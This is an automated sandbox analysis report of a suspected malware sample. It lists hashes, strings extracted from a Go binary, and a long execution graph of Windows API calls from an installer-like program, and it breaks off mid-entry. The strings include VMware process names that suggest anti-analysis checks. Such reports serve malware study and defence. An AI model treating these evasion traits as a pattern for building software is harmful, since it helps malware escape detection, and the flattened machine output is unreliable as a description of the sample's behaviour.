                                                                                            • Instruction ID: 54d86a38c7ca5e9b4d361dfb47ed8c6cf3eb888c171a558932b5f88d5bc68312
                                                                                            • Opcode Fuzzy Hash: 5abccb9955bb7e61ea68e392401cb810dba1d0244b6c3c0f14204fc9a1a2f5da
                                                                                            • Instruction Fuzzy Hash: 8281CFB45097018FD700EF66C18575AFBE0BF88708F41992EF49887392EB789949CF5A

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            • releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip, xrefs: 004439E1
                                                                                            • releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog, xrefs: 00443929
                                                                                            • m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr, xrefs: 0044394B
                                                                                            • p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req, xrefs: 00443997
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000840000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000C77000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000C7A000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000CCF000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000CD3000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000CEF000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000CF6000.00000040.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • API String ID: 0-3530339137
                                                                                            • Opcode ID: 8b027008e4681ae371e7009484516bb6ae8be36b8b546ccf354ab389333accda
                                                                                            • Instruction ID: 41eda2ad12dc9040aabd0b4fda58d31df6fc94468559f7c6cc3daccb715ab915
                                                                                            • Opcode Fuzzy Hash: 8b027008e4681ae371e7009484516bb6ae8be36b8b546ccf354ab389333accda
                                                                                            • Instruction Fuzzy Hash: 9C31E2B45087418FD700EF25C185B1AFBE1BF88708F45882EF4888B352DB789948CB6A

Execution Graph

Execution Coverage: 18.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 16.4%
Total number of Nodes: 1337
Total number of Limit Nodes: 23
                                                                                            execution_graph 3581 404f43 GetDlgItem GetDlgItem 3582 404f95 7 API calls 3581->3582 3590 4051ba 3581->3590 3583 40503c DeleteObject 3582->3583 3584 40502f SendMessageW 3582->3584 3585 405045 3583->3585 3584->3583 3586 40507c 3585->3586 3591 406594 21 API calls 3585->3591 3633 4044d6 3586->3633 3587 40529c 3589 405348 3587->3589 3594 4051ad 3587->3594 3600 4052f5 SendMessageW 3587->3600 3595 405352 SendMessageW 3589->3595 3596 40535a 3589->3596 3590->3587 3615 405229 3590->3615 3638 404e91 SendMessageW 3590->3638 3592 40505e SendMessageW SendMessageW 3591->3592 3592->3585 3593 405090 3599 4044d6 22 API calls 3593->3599 3655 40453d 3594->3655 3595->3596 3603 405373 3596->3603 3604 40536c ImageList_Destroy 3596->3604 3611 405383 3596->3611 3616 4050a1 3599->3616 3600->3594 3606 40530a SendMessageW 3600->3606 3601 40528e SendMessageW 3601->3587 3607 40537c GlobalFree 3603->3607 3603->3611 3604->3603 3605 4054fd 3605->3594 3612 40550f ShowWindow GetDlgItem ShowWindow 3605->3612 3609 40531d 3606->3609 3607->3611 3608 40517c GetWindowLongW SetWindowLongW 3610 405195 3608->3610 3620 40532e SendMessageW 3609->3620 3613 4051b2 3610->3613 3614 40519a ShowWindow 3610->3614 3611->3605 3628 4053be 3611->3628 3643 404f11 3611->3643 3612->3594 3637 40450b SendMessageW 3613->3637 3636 40450b SendMessageW 3614->3636 3615->3587 3615->3601 3616->3608 3619 4050f4 SendMessageW 3616->3619 3621 405177 3616->3621 3622 405132 SendMessageW 3616->3622 3623 405146 SendMessageW 3616->3623 3619->3616 3620->3589 3621->3608 3621->3610 3622->3616 3623->3616 3625 4054c8 3626 4054d3 InvalidateRect 3625->3626 3630 4054df 3625->3630 3626->3630 3627 4053ec SendMessageW 3629 405402 3627->3629 3628->3627 3628->3629 3629->3625 3631 405476 SendMessageW SendMessageW 3629->3631 3630->3605 3652 404e4c 3630->3652 3631->3629 3634 406594 21 API calls 3633->3634 3635 4044e1 SetDlgItemTextW 3634->3635 3635->3593 3636->3594 
3637->3590 3639 404ef0 SendMessageW 3638->3639 3640 404eb4 GetMessagePos ScreenToClient SendMessageW 3638->3640 3641 404ee8 3639->3641 3640->3641 3642 404eed 3640->3642 3641->3615 3642->3639 3669 406557 lstrcpynW 3643->3669 3645 404f24 3670 40649e wsprintfW 3645->3670 3647 404f2e 3648 40140b 2 API calls 3647->3648 3649 404f37 3648->3649 3671 406557 lstrcpynW 3649->3671 3651 404f3e 3651->3628 3672 404d83 3652->3672 3654 404e61 3654->3605 3656 404555 GetWindowLongW 3655->3656 3666 404600 3655->3666 3657 40456a 3656->3657 3656->3666 3658 404597 GetSysColor 3657->3658 3659 40459a 3657->3659 3657->3666 3658->3659 3660 4045a0 SetTextColor 3659->3660 3661 4045aa SetBkMode 3659->3661 3660->3661 3662 4045c2 GetSysColor 3661->3662 3663 4045c8 3661->3663 3662->3663 3664 4045d9 3663->3664 3665 4045cf SetBkColor 3663->3665 3664->3666 3667 4045f3 CreateBrushIndirect 3664->3667 3668 4045ec DeleteObject 3664->3668 3665->3664 3667->3666 3668->3667 3669->3645 3670->3647 3671->3651 3673 404d9c 3672->3673 3674 406594 21 API calls 3673->3674 3675 404e00 3674->3675 3676 406594 21 API calls 3675->3676 3677 404e0b 3676->3677 3678 406594 21 API calls 3677->3678 3679 404e21 lstrlenW wsprintfW SetDlgItemTextW 3678->3679 3679->3654 3680 402643 3681 402672 3680->3681 3682 402657 3680->3682 3684 4026a2 3681->3684 3685 402677 3681->3685 3683 402d89 21 API calls 3682->3683 3694 40265e 3683->3694 3687 402dab 21 API calls 3684->3687 3686 402dab 21 API calls 3685->3686 3688 40267e 3686->3688 3689 4026a9 lstrlenW 3687->3689 3697 406579 WideCharToMultiByte 3688->3697 3689->3694 3691 402692 lstrlenA 3691->3694 3692 4026d6 3693 4026ec 3692->3693 3695 4060f9 WriteFile 3692->3695 3694->3692 3694->3693 3698 406128 SetFilePointer 3694->3698 3695->3693 3697->3691 3699 406144 3698->3699 3700 40615c 3698->3700 3701 4060ca ReadFile 3699->3701 3700->3692 3702 406150 3701->3702 3702->3700 3703 406165 SetFilePointer 3702->3703 3704 40618d SetFilePointer 3702->3704 3703->3704 3705 406170 3703->3705 3704->3700 3706 
4060f9 WriteFile 3705->3706 3706->3700 3471 4015c6 3472 402dab 21 API calls 3471->3472 3473 4015cd 3472->3473 3474 405ed1 4 API calls 3473->3474 3489 4015d6 3474->3489 3475 401636 3477 401668 3475->3477 3478 40163b 3475->3478 3476 405e53 CharNextW 3476->3489 3480 401423 28 API calls 3477->3480 3490 401423 3478->3490 3486 401660 3480->3486 3482 405b05 2 API calls 3482->3489 3484 405b22 5 API calls 3484->3489 3485 40164f SetCurrentDirectoryW 3485->3486 3487 40161c GetFileAttributesW 3487->3489 3488 405aab 2 API calls 3488->3489 3489->3475 3489->3476 3489->3482 3489->3484 3489->3487 3489->3488 3491 4055dc 28 API calls 3490->3491 3492 401431 3491->3492 3493 406557 lstrcpynW 3492->3493 3493->3485 3707 404646 lstrlenW 3708 404665 3707->3708 3709 404667 WideCharToMultiByte 3707->3709 3708->3709 3710 4049c7 3711 4049f3 3710->3711 3712 404a04 3710->3712 3771 405b9b GetDlgItemTextW 3711->3771 3714 404a10 GetDlgItem 3712->3714 3715 404a6f 3712->3715 3718 404a24 3714->3718 3716 404b53 3715->3716 3724 406594 21 API calls 3715->3724 3769 404d02 3715->3769 3716->3769 3773 405b9b GetDlgItemTextW 3716->3773 3717 4049fe 3719 406805 5 API calls 3717->3719 3720 404a38 SetWindowTextW 3718->3720 3722 405ed1 4 API calls 3718->3722 3719->3712 3723 4044d6 22 API calls 3720->3723 3728 404a2e 3722->3728 3729 404a54 3723->3729 3730 404ae3 SHBrowseForFolderW 3724->3730 3725 404b83 3731 405f2e 18 API calls 3725->3731 3726 40453d 8 API calls 3727 404d16 3726->3727 3728->3720 3735 405e26 3 API calls 3728->3735 3732 4044d6 22 API calls 3729->3732 3730->3716 3733 404afb CoTaskMemFree 3730->3733 3734 404b89 3731->3734 3736 404a62 3732->3736 3737 405e26 3 API calls 3733->3737 3774 406557 lstrcpynW 3734->3774 3735->3720 3772 40450b SendMessageW 3736->3772 3744 404b08 3737->3744 3740 404a68 3743 40694b 5 API calls 3740->3743 3741 404b3f SetDlgItemTextW 3741->3716 3742 404ba0 3745 40694b 5 API calls 3742->3745 3743->3715 3744->3741 3746 406594 21 API calls 3744->3746 3752 404ba7 3745->3752 3747 404b27 
lstrcmpiW 3746->3747 3747->3741 3750 404b38 lstrcatW 3747->3750 3748 404be8 3775 406557 lstrcpynW 3748->3775 3750->3741 3751 404bef 3753 405ed1 4 API calls 3751->3753 3752->3748 3756 405e72 2 API calls 3752->3756 3758 404c40 3752->3758 3754 404bf5 GetDiskFreeSpaceW 3753->3754 3757 404c19 MulDiv 3754->3757 3754->3758 3756->3752 3757->3758 3759 404cb1 3758->3759 3761 404e4c 24 API calls 3758->3761 3760 404cd4 3759->3760 3762 40140b 2 API calls 3759->3762 3776 4044f8 EnableWindow 3760->3776 3763 404c9e 3761->3763 3762->3760 3765 404cb3 SetDlgItemTextW 3763->3765 3766 404ca3 3763->3766 3765->3759 3768 404d83 24 API calls 3766->3768 3767 404cf0 3767->3769 3777 404920 3767->3777 3768->3759 3769->3726 3771->3717 3772->3740 3773->3725 3774->3742 3775->3751 3776->3767 3778 404933 SendMessageW 3777->3778 3779 40492e 3777->3779 3778->3769 3779->3778 3780 401c48 3781 402d89 21 API calls 3780->3781 3782 401c4f 3781->3782 3783 402d89 21 API calls 3782->3783 3784 401c5c 3783->3784 3785 401c71 3784->3785 3786 402dab 21 API calls 3784->3786 3787 402dab 21 API calls 3785->3787 3791 401c81 3785->3791 3786->3785 3787->3791 3788 401cd8 3790 402dab 21 API calls 3788->3790 3789 401c8c 3792 402d89 21 API calls 3789->3792 3793 401cdd 3790->3793 3791->3788 3791->3789 3794 401c91 3792->3794 3795 402dab 21 API calls 3793->3795 3796 402d89 21 API calls 3794->3796 3798 401ce6 FindWindowExW 3795->3798 3797 401c9d 3796->3797 3799 401cc8 SendMessageW 3797->3799 3800 401caa SendMessageTimeoutW 3797->3800 3801 401d08 3798->3801 3799->3801 3800->3801 3802 4028c9 3803 4028cf 3802->3803 3804 4028d7 FindClose 3803->3804 3805 402c2f 3803->3805 3804->3805 3545 403b4f 3546 403b67 3545->3546 3547 403b59 CloseHandle 3545->3547 3552 403b94 3546->3552 3547->3546 3550 405c63 71 API calls 3551 403b78 3550->3551 3553 403ba2 3552->3553 3554 403ba7 FreeLibrary GlobalFree 3553->3554 3555 403b6c 3553->3555 3554->3554 3554->3555 3555->3550 3809 405550 3810 405560 3809->3810 3811 405574 3809->3811 3813 405566 
3810->3813 3814 4055bd 3810->3814 3812 40557c IsWindowVisible 3811->3812 3820 405593 3811->3820 3812->3814 3816 405589 3812->3816 3815 404522 SendMessageW 3813->3815 3817 4055c2 CallWindowProcW 3814->3817 3818 405570 3815->3818 3819 404e91 5 API calls 3816->3819 3817->3818 3819->3820 3820->3817 3821 404f11 4 API calls 3820->3821 3821->3814 3822 4016d1 3823 402dab 21 API calls 3822->3823 3824 4016d7 GetFullPathNameW 3823->3824 3825 4016f1 3824->3825 3826 401713 3824->3826 3825->3826 3829 4068b4 2 API calls 3825->3829 3827 401728 GetShortPathNameW 3826->3827 3828 402c2f 3826->3828 3827->3828 3830 401703 3829->3830 3830->3826 3832 406557 lstrcpynW 3830->3832 3832->3826 3833 401e53 GetDC 3834 402d89 21 API calls 3833->3834 3835 401e65 GetDeviceCaps MulDiv ReleaseDC 3834->3835 3836 402d89 21 API calls 3835->3836 3837 401e96 3836->3837 3838 406594 21 API calls 3837->3838 3839 401ed3 CreateFontIndirectW 3838->3839 3840 40263d 3839->3840 3841 402955 3842 402dab 21 API calls 3841->3842 3843 402961 3842->3843 3844 402977 3843->3844 3845 402dab 21 API calls 3843->3845 3846 406022 2 API calls 3844->3846 3845->3844 3847 40297d 3846->3847 3869 406047 GetFileAttributesW CreateFileW 3847->3869 3849 40298a 3850 402a40 3849->3850 3853 4029a5 GlobalAlloc 3849->3853 3854 402a28 3849->3854 3851 402a47 DeleteFileW 3850->3851 3852 402a5a 3850->3852 3851->3852 3853->3854 3855 4029be 3853->3855 3856 4032b9 35 API calls 3854->3856 3870 4034ea SetFilePointer 3855->3870 3858 402a35 CloseHandle 3856->3858 3858->3850 3859 4029c4 3860 4034d4 ReadFile 3859->3860 3861 4029cd GlobalAlloc 3860->3861 3862 402a11 3861->3862 3863 4029dd 3861->3863 3865 4060f9 WriteFile 3862->3865 3864 4032b9 35 API calls 3863->3864 3867 4029ea 3864->3867 3866 402a1d GlobalFree 3865->3866 3866->3854 3868 402a08 GlobalFree 3867->3868 3868->3862 3869->3849 3870->3859 3871 403fd7 3872 404150 3871->3872 3873 403fef 3871->3873 3875 404161 GetDlgItem GetDlgItem 3872->3875 3892 4041a1 3872->3892 3873->3872 3874 403ffb 
3873->3874 3876 404006 SetWindowPos 3874->3876 3877 404019 3874->3877 3878 4044d6 22 API calls 3875->3878 3876->3877 3881 404022 ShowWindow 3877->3881 3882 404064 3877->3882 3883 40418b SetClassLongW 3878->3883 3879 4041fb 3880 404522 SendMessageW 3879->3880 3885 40414b 3879->3885 3910 40420d 3880->3910 3886 404042 GetWindowLongW 3881->3886 3887 40410e 3881->3887 3888 404083 3882->3888 3889 40406c DestroyWindow 3882->3889 3890 40140b 2 API calls 3883->3890 3884 401389 2 API calls 3895 4041d3 3884->3895 3886->3887 3897 40405b ShowWindow 3886->3897 3896 40453d 8 API calls 3887->3896 3893 404088 SetWindowLongW 3888->3893 3894 404099 3888->3894 3891 40445f 3889->3891 3890->3892 3891->3885 3904 404490 ShowWindow 3891->3904 3892->3879 3892->3884 3893->3885 3894->3887 3898 4040a5 GetDlgItem 3894->3898 3895->3879 3899 4041d7 SendMessageW 3895->3899 3896->3885 3897->3882 3902 4040d3 3898->3902 3903 4040b6 SendMessageW IsWindowEnabled 3898->3903 3899->3885 3900 40140b 2 API calls 3900->3910 3901 404461 DestroyWindow EndDialog 3901->3891 3906 4040e0 3902->3906 3908 404127 SendMessageW 3902->3908 3909 4040f3 3902->3909 3916 4040d8 3902->3916 3903->3885 3903->3902 3904->3885 3905 406594 21 API calls 3905->3910 3906->3908 3906->3916 3908->3887 3911 404110 3909->3911 3912 4040fb 3909->3912 3910->3885 3910->3900 3910->3901 3910->3905 3913 4044d6 22 API calls 3910->3913 3917 4044d6 22 API calls 3910->3917 3933 4043a1 DestroyWindow 3910->3933 3914 40140b 2 API calls 3911->3914 3915 40140b 2 API calls 3912->3915 3913->3910 3914->3916 3915->3916 3916->3887 3942 4044af 3916->3942 3918 404288 GetDlgItem 3917->3918 3919 4042a5 ShowWindow EnableWindow 3918->3919 3920 40429d 3918->3920 3945 4044f8 EnableWindow 3919->3945 3920->3919 3922 4042cf EnableWindow 3927 4042e3 3922->3927 3923 4042e8 GetSystemMenu EnableMenuItem SendMessageW 3924 404318 SendMessageW 3923->3924 3923->3927 3924->3927 3926 403fb8 22 API calls 3926->3927 3927->3923 3927->3926 3946 40450b SendMessageW 3927->3946 3947 
406557 lstrcpynW 3927->3947 3929 404347 lstrlenW 3930 406594 21 API calls 3929->3930 3931 40435d SetWindowTextW 3930->3931 3932 401389 2 API calls 3931->3932 3932->3910 3933->3891 3934 4043bb CreateDialogParamW 3933->3934 3934->3891 3935 4043ee 3934->3935 3936 4044d6 22 API calls 3935->3936 3937 4043f9 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3936->3937 3938 401389 2 API calls 3937->3938 3939 40443f 3938->3939 3939->3885 3940 404447 ShowWindow 3939->3940 3941 404522 SendMessageW 3940->3941 3941->3891 3943 4044b6 3942->3943 3944 4044bc SendMessageW 3942->3944 3943->3944 3944->3887 3945->3922 3946->3927 3947->3929 3948 4014d7 3949 402d89 21 API calls 3948->3949 3950 4014dd Sleep 3949->3950 3952 402c2f 3950->3952 3953 40195b 3954 402dab 21 API calls 3953->3954 3955 401962 lstrlenW 3954->3955 3956 40263d 3955->3956 3519 4020dd 3520 4021a1 3519->3520 3521 4020ef 3519->3521 3523 401423 28 API calls 3520->3523 3522 402dab 21 API calls 3521->3522 3524 4020f6 3522->3524 3529 4022fb 3523->3529 3525 402dab 21 API calls 3524->3525 3526 4020ff 3525->3526 3527 402115 LoadLibraryExW 3526->3527 3528 402107 GetModuleHandleW 3526->3528 3527->3520 3530 402126 3527->3530 3528->3527 3528->3530 3539 4069ba 3530->3539 3533 402170 3535 4055dc 28 API calls 3533->3535 3534 402137 3536 401423 28 API calls 3534->3536 3537 402147 3534->3537 3535->3537 3536->3537 3537->3529 3538 402193 FreeLibrary 3537->3538 3538->3529 3544 406579 WideCharToMultiByte 3539->3544 3541 4069d7 3542 402131 3541->3542 3543 4069de GetProcAddress 3541->3543 3542->3533 3542->3534 3543->3542 3544->3541 3957 402b5e 3958 402bb0 3957->3958 3959 402b65 3957->3959 3960 40694b 5 API calls 3958->3960 3962 402d89 21 API calls 3959->3962 3965 402bae 3959->3965 3961 402bb7 3960->3961 3963 402dab 21 API calls 3961->3963 3964 402b73 3962->3964 3966 402bc0 3963->3966 3967 402d89 21 API calls 3964->3967 3966->3965 3968 402bc4 IIDFromString 3966->3968 3971 402b7f 3967->3971 3968->3965 3969 402bd3 3968->3969 3969->3965 3975 
406557 lstrcpynW 3969->3975 3974 40649e wsprintfW 3971->3974 3972 402bf0 CoTaskMemFree 3972->3965 3974->3965 3975->3972 2924 401761 2930 402dab 2924->2930 2928 40176f 2929 406076 2 API calls 2928->2929 2929->2928 2931 402db7 2930->2931 2940 406594 2931->2940 2934 401768 2936 406076 2934->2936 2937 406083 GetTickCount GetTempFileNameW 2936->2937 2938 4060bd 2937->2938 2939 4060b9 2937->2939 2938->2928 2939->2937 2939->2938 2955 40659f 2940->2955 2941 4067e6 2942 402dd8 2941->2942 2979 406557 lstrcpynW 2941->2979 2942->2934 2957 406805 2942->2957 2944 4067b7 lstrlenW 2944->2955 2948 4066b0 GetSystemDirectoryW 2948->2955 2949 406594 15 API calls 2949->2944 2950 4066c6 GetWindowsDirectoryW 2950->2955 2951 406594 15 API calls 2951->2955 2952 406758 lstrcatW 2952->2955 2953 406805 5 API calls 2953->2955 2955->2941 2955->2944 2955->2948 2955->2949 2955->2950 2955->2951 2955->2952 2955->2953 2956 406728 SHGetPathFromIDListW CoTaskMemFree 2955->2956 2966 406425 2955->2966 2971 40694b GetModuleHandleA 2955->2971 2977 40649e wsprintfW 2955->2977 2978 406557 lstrcpynW 2955->2978 2956->2955 2963 406812 2957->2963 2958 40688d CharPrevW 2959 406888 2958->2959 2959->2958 2961 4068ae 2959->2961 2960 40687b CharNextW 2960->2959 2960->2963 2961->2934 2963->2959 2963->2960 2964 406867 CharNextW 2963->2964 2965 406876 CharNextW 2963->2965 2987 405e53 2963->2987 2964->2963 2965->2960 2980 4063c4 2966->2980 2969 406489 2969->2955 2970 406459 RegQueryValueExW RegCloseKey 2970->2969 2972 406971 GetProcAddress 2971->2972 2973 406967 2971->2973 2974 406980 2972->2974 2984 4068db GetSystemDirectoryW 2973->2984 2974->2955 2976 40696d 2976->2972 2976->2974 2977->2955 2978->2955 2979->2942 2981 4063d3 2980->2981 2982 4063d7 2981->2982 2983 4063dc RegOpenKeyExW 2981->2983 2982->2969 2982->2970 2983->2982 2985 4068fd wsprintfW LoadLibraryExW 2984->2985 2985->2976 2988 405e59 2987->2988 2989 405e6f 2988->2989 2990 405e60 CharNextW 2988->2990 2989->2963 2990->2988 3976 401d62 3977 402d89 21 API 
calls 3976->3977 3978 401d73 SetWindowLongW 3977->3978 3979 402c2f 3978->3979 3980 4028e3 3981 4028eb 3980->3981 3982 4028ef FindNextFileW 3981->3982 3985 402901 3981->3985 3983 402948 3982->3983 3982->3985 3986 406557 lstrcpynW 3983->3986 3986->3985 3987 403be7 3988 403bf2 3987->3988 3989 403bf9 GlobalAlloc 3988->3989 3990 403bf6 3988->3990 3989->3990 3991 401568 3992 402ba9 3991->3992 3995 40649e wsprintfW 3992->3995 3994 402bae 3995->3994 3996 40196d 3997 402d89 21 API calls 3996->3997 3998 401974 3997->3998 3999 402d89 21 API calls 3998->3999 4000 401981 3999->4000 4001 402dab 21 API calls 4000->4001 4002 401998 lstrlenW 4001->4002 4004 4019a9 4002->4004 4003 4019ea 4004->4003 4008 406557 lstrcpynW 4004->4008 4006 4019da 4006->4003 4007 4019df lstrlenW 4006->4007 4007->4003 4008->4006 4009 40166f 4010 402dab 21 API calls 4009->4010 4011 401675 4010->4011 4012 4068b4 2 API calls 4011->4012 4013 40167b 4012->4013 4014 402af0 4015 402d89 21 API calls 4014->4015 4016 402af6 4015->4016 4017 402933 4016->4017 4018 406594 21 API calls 4016->4018 4018->4017 4019 4026f1 4020 402d89 21 API calls 4019->4020 4028 402700 4020->4028 4021 40283d 4022 40274a ReadFile 4022->4021 4022->4028 4023 4060ca ReadFile 4023->4028 4024 406128 5 API calls 4024->4028 4025 40278a MultiByteToWideChar 4025->4028 4026 40283f 4032 40649e wsprintfW 4026->4032 4028->4021 4028->4022 4028->4023 4028->4024 4028->4025 4028->4026 4029 4027b0 SetFilePointer MultiByteToWideChar 4028->4029 4031 402850 4028->4031 4029->4028 4030 402871 SetFilePointer 4030->4021 4031->4021 4031->4030 4032->4021 3424 401774 3425 402dab 21 API calls 3424->3425 3426 40177b 3425->3426 3427 4017a3 3426->3427 3428 40179b 3426->3428 3464 406557 lstrcpynW 3427->3464 3463 406557 lstrcpynW 3428->3463 3431 4017a1 3435 406805 5 API calls 3431->3435 3432 4017ae 3433 405e26 3 API calls 3432->3433 3434 4017b4 lstrcatW 3433->3434 3434->3431 3445 4017c0 3435->3445 3436 4068b4 2 API calls 3436->3445 3437 406022 2 API calls 3437->3445 3439 
4017d2 CompareFileTime 3439->3445 3440 401892 3441 4055dc 28 API calls 3440->3441 3443 40189c 3441->3443 3442 4055dc 28 API calls 3444 40187e 3442->3444 3446 4032b9 35 API calls 3443->3446 3445->3436 3445->3437 3445->3439 3445->3440 3449 406594 21 API calls 3445->3449 3454 406557 lstrcpynW 3445->3454 3459 405bb7 MessageBoxIndirectW 3445->3459 3460 401869 3445->3460 3462 406047 GetFileAttributesW CreateFileW 3445->3462 3447 4018af 3446->3447 3448 4018c3 SetFileTime 3447->3448 3450 4018d5 FindCloseChangeNotification 3447->3450 3448->3450 3449->3445 3450->3444 3451 4018e6 3450->3451 3452 4018eb 3451->3452 3453 4018fe 3451->3453 3455 406594 21 API calls 3452->3455 3456 406594 21 API calls 3453->3456 3454->3445 3457 4018f3 lstrcatW 3455->3457 3458 401906 3456->3458 3457->3458 3461 405bb7 MessageBoxIndirectW 3458->3461 3459->3445 3460->3442 3460->3444 3461->3444 3462->3445 3463->3431 3464->3432 4033 4014f5 SetForegroundWindow 4034 402c2f 4033->4034 4035 401a77 4036 402d89 21 API calls 4035->4036 4037 401a80 4036->4037 4038 402d89 21 API calls 4037->4038 4039 401a25 4038->4039 4040 401578 4041 401591 4040->4041 4042 401588 ShowWindow 4040->4042 4043 402c2f 4041->4043 4044 40159f ShowWindow 4041->4044 4042->4041 4044->4043 4045 4023f9 4046 402dab 21 API calls 4045->4046 4047 402408 4046->4047 4048 402dab 21 API calls 4047->4048 4049 402411 4048->4049 4050 402dab 21 API calls 4049->4050 4051 40241b GetPrivateProfileStringW 4050->4051 4052 401ffb 4053 402dab 21 API calls 4052->4053 4054 402002 4053->4054 4055 4068b4 2 API calls 4054->4055 4056 402008 4055->4056 4058 402019 4056->4058 4059 40649e wsprintfW 4056->4059 4059->4058 4060 401b7c 4061 402dab 21 API calls 4060->4061 4062 401b83 4061->4062 4063 402d89 21 API calls 4062->4063 4064 401b8c wsprintfW 4063->4064 4065 402c2f 4064->4065 4066 401000 4067 401037 BeginPaint GetClientRect 4066->4067 4068 40100c DefWindowProcW 4066->4068 4070 4010f3 4067->4070 4073 401179 4068->4073 4071 401073 CreateBrushIndirect FillRect 
DeleteObject 4070->4071 4072 4010fc 4070->4072 4071->4070 4074 401102 CreateFontIndirectW 4072->4074 4075 401167 EndPaint 4072->4075 4074->4075 4076 401112 6 API calls 4074->4076 4075->4073 4076->4075 4077 404980 4078 404990 4077->4078 4079 4049b6 4077->4079 4080 4044d6 22 API calls 4078->4080 4081 40453d 8 API calls 4079->4081 4082 40499d SetDlgItemTextW 4080->4082 4083 4049c2 4081->4083 4082->4079 4084 401680 4085 402dab 21 API calls 4084->4085 4086 401687 4085->4086 4087 402dab 21 API calls 4086->4087 4088 401690 4087->4088 4089 402dab 21 API calls 4088->4089 4090 401699 MoveFileW 4089->4090 4091 4016a5 4090->4091 4092 4016ac 4090->4092 4094 401423 28 API calls 4091->4094 4093 4068b4 2 API calls 4092->4093 4096 4022fb 4092->4096 4095 4016bb 4093->4095 4094->4096 4095->4096 4097 406317 40 API calls 4095->4097 4097->4091 4098 401503 4099 401508 4098->4099 4101 401520 4098->4101 4100 402d89 21 API calls 4099->4100 4100->4101 4102 401a04 4103 402dab 21 API calls 4102->4103 4104 401a0b 4103->4104 4105 402dab 21 API calls 4104->4105 4106 401a14 4105->4106 4107 401a1b lstrcmpiW 4106->4107 4108 401a2d lstrcmpW 4106->4108 4109 401a21 4107->4109 4108->4109 4110 402304 4111 402dab 21 API calls 4110->4111 4112 40230a 4111->4112 4113 402dab 21 API calls 4112->4113 4114 402313 4113->4114 4115 402dab 21 API calls 4114->4115 4116 40231c 4115->4116 4117 4068b4 2 API calls 4116->4117 4118 402325 4117->4118 4119 402336 lstrlenW lstrlenW 4118->4119 4120 402329 4118->4120 4122 4055dc 28 API calls 4119->4122 4121 4055dc 28 API calls 4120->4121 4124 402331 4120->4124 4121->4124 4123 402374 SHFileOperationW 4122->4123 4123->4120 4123->4124 4125 401d86 4126 401d99 GetDlgItem 4125->4126 4127 401d8c 4125->4127 4129 401d93 4126->4129 4128 402d89 21 API calls 4127->4128 4128->4129 4130 401dda GetClientRect LoadImageW SendMessageW 4129->4130 4131 402dab 21 API calls 4129->4131 4133 401e38 4130->4133 4135 401e44 4130->4135 4131->4130 4134 401e3d DeleteObject 4133->4134 4133->4135 4134->4135 
4136 402388 4137 4023a2 4136->4137 4138 40238f 4136->4138 4139 406594 21 API calls 4138->4139 4140 40239c 4139->4140 4141 405bb7 MessageBoxIndirectW 4140->4141 4141->4137 3494 401389 3496 401390 3494->3496 3495 4013fe 3496->3495 3497 4013cb MulDiv SendMessageW 3496->3497 3497->3496 4142 402c0a SendMessageW 4143 402c24 InvalidateRect 4142->4143 4144 402c2f 4142->4144 4143->4144 4145 40460c lstrcpynW lstrlenW 3556 40248f 3557 402dab 21 API calls 3556->3557 3558 4024a1 3557->3558 3559 402dab 21 API calls 3558->3559 3560 4024ab 3559->3560 3573 402e3b 3560->3573 3563 4024e3 3565 4024ef 3563->3565 3568 402d89 21 API calls 3563->3568 3564 402dab 21 API calls 3567 4024d9 lstrlenW 3564->3567 3569 40250e RegSetValueExW 3565->3569 3570 4032b9 35 API calls 3565->3570 3566 402933 3567->3563 3568->3565 3571 402524 RegCloseKey 3569->3571 3570->3569 3571->3566 3574 402e56 3573->3574 3577 4063f2 3574->3577 3578 406401 3577->3578 3579 4024bb 3578->3579 3580 40640c RegCreateKeyExW 3578->3580 3579->3563 3579->3564 3579->3566 3580->3579 4146 402910 4147 402dab 21 API calls 4146->4147 4148 402917 FindFirstFileW 4147->4148 4149 40293f 4148->4149 4153 40292a 4148->4153 4154 40649e wsprintfW 4149->4154 4151 402948 4155 406557 lstrcpynW 4151->4155 4154->4151 4155->4153 4156 401911 4157 401948 4156->4157 4158 402dab 21 API calls 4157->4158 4159 40194d 4158->4159 4160 405c63 71 API calls 4159->4160 4161 401956 4160->4161 4162 401491 4163 4055dc 28 API calls 4162->4163 4164 401498 4163->4164 4165 401914 4166 402dab 